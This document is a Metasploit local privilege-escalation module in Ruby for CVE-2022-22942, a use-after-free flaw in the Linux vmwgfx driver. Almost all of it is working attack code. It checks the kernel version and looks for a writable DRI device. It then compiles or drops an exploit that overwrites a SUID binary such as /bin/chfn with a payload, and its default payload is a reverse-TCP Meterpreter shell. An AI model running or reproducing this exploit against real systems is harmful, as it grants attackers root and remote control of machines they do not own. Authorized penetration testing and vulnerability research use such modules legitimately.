vmwgfx Driver File Descriptor Handling Privilege Escalation

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = GoodRanking  
  
include Msf::Post::Linux::Priv  
include Msf::Post::Linux::System  
include Msf::Post::Linux::Kernel  
include Msf::Post::File  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
include Msf::Post::Linux::Compile  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'vmwgfx Driver File Descriptor Handling Priv Esc',  
'Description' => %q{  
If the vmwgfx driver fails to copy the 'fence_rep' object to userland, it tries to  
recover by deallocating the (already populated) file descriptor. This is  
wrong, as the fd gets released via put_unused_fd() which shouldn't be used,  
as the fd table slot was already populated via the previous call to  
fd_install(). This leaves userland with a valid fd table entry pointing to  
a free'd 'file' object.  
  
We use this bug to overwrite a SUID binary with our payload and gain root.  
Linux kernel 4.14-rc1 - 5.17-rc1 are vulnerable.  
  
Successfully tested against Ubuntu 22.04.01 with kernel 5.13.12-051312-generic.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
'h00die', # msf module  
'Mathias Krause' # original PoC, analysis  
],  
'Platform' => [ 'linux' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'SessionTypes' => [ 'shell', 'meterpreter' ],  
'Targets' => [[ 'Auto', {} ]],  
'Privileged' => true,  
'References' => [  
[ 'URL', 'https://grsecurity.net/exploiting_and_defending_against_same_type_object_reuse' ],  
[ 'URL', 'https://github.com/opensrcsec/same_type_object_reuse_exploits' ],  
[ 'CVE', '2022-22942' ]  
],  
'DisclosureDate' => '2022-01-28',  
'DefaultTarget' => 0,  
'DefaultOptions' => {  
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',  
'PrependFork' => true  
},  
'Notes' => {  
'Stability' => [CRASH_OS_DOWN],  
'Reliability' => [REPEATABLE_SESSION],  
# seeing "BUG: Bad page cache in process <process> pfn:<5 characters>" on console  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]  
}  
)  
)  
register_advanced_options [  
OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ])  
]  
end  
  
def base_dir  
datastore['WritableDir'].to_s  
end  
  
def check  
# Check the kernel version to see if its in a vulnerable range  
release = kernel_release  
unless Rex::Version.new(release) > Rex::Version.new('4.14-rc1') &&  
Rex::Version.new(release) < Rex::Version.new('5.17-rc1')  
return CheckCode::Safe("Kernel version #{release} is not vulnerable")  
end  
  
vprint_good "Kernel version #{release} appears to be vulnerable"  
  
@driver = nil  
  
if writable?('/dev/dri/card0') # ubuntu, RHEL  
@driver = '/dev/dri/card0'  
elsif writable?('/dev/dri/renderD128') # debian  
@driver = '/dev/dri/renderD128'  
else  
return CheckCode::Safe('Unable to write to /dev/dri/card0 or /dev/dri/renderD128')  
end  
vprint_good("#{@driver} found writable")  
  
@suid_target = nil  
if setuid?('/bin/chfn') # ubuntu  
@suid_target = '/bin/chfn'  
elsif writable?('/bin/chage') # RHEL/Centos  
@suid_target = '/bin/chage'  
else  
return CheckCode::Safe('/bin/chfn isn\'t SUID or /bin/chage not writable')  
end  
vprint_good("#{@suid_target} suid binary found")  
  
if kernel_modules&.include?('vmwgfx')  
return CheckCode::Appears('vmwgfx installed')  
end  
  
CheckCode::Safe('Vulnerable driver (vmwgfx) not found')  
end  
  
def exploit  
# Check if we're already root  
if is_root? && !datastore['ForceExploit']  
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'  
end  
  
# Make sure we can write our exploit and payload to the local system  
unless writable? base_dir  
fail_with Failure::BadConfig, "#{base_dir} is not writable"  
end  
  
# backup the suid binary before we overwrite it  
@suid_backup = read_file(@suid_target)  
path = store_loot(  
@suid_target,  
'application/octet-stream',  
rhost,  
@suid_backup,  
@suid_target  
)  
print_good("Original #{@suid_target} backed up to #{path}")  
executable_name = ".#{rand_text_alphanumeric(5..10)}"  
executable_path = "#{base_dir}/#{executable_name}"  
if live_compile?  
vprint_status 'Live compiling exploit on system...'  
payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"  
  
c_code = exploit_source('CVE-2022-22942', 'cve-2022-22942-dc.c')  
c_code = c_code.gsub('/dev/dri/card0', @driver) # ensure the right driver device is called  
c_code = c_code.gsub('/bin/chfn', @suid_target) # ensure we have our suid target  
c_code = c_code.gsub('/proc/self/exe', payload_path) # change exe to our payload  
  
upload_and_compile executable_path, strip_comments(c_code)  
register_files_for_cleanup(executable_path)  
else  
unless @suid_target == '/bin/chfn'  
fail_with(Failure::BadConfig, 'Pre-compiled is only valid against Ubuntu based systems')  
end  
vprint_status 'Dropping pre-compiled exploit on system...'  
payload_path = '/tmp/.aYd3GAMlK'  
upload_and_chmodx executable_path, exploit_data('CVE-2022-22942', 'pre_compiled')  
end  
  
# Upload payload executable  
print_status("Uploading payload to #{payload_path}")  
upload_and_chmodx payload_path, generate_payload_exe  
register_files_for_cleanup(generate_payload_exe)  
  
print_status 'Launching exploit...'  
output = cmd_exec executable_path, nil, 30  
output.each_line { |line| vprint_status line.chomp }  
end  
  
def cleanup  
if @suid_backup.nil?  
print_bad("MANUAL replacement of trojaned #{@suid_target} is required.")  
else  
print_status("Replacing trojaned #{@suid_target} with original")  
write_file(@suid_target, @suid_backup)  
end  
super  
end  
end  
`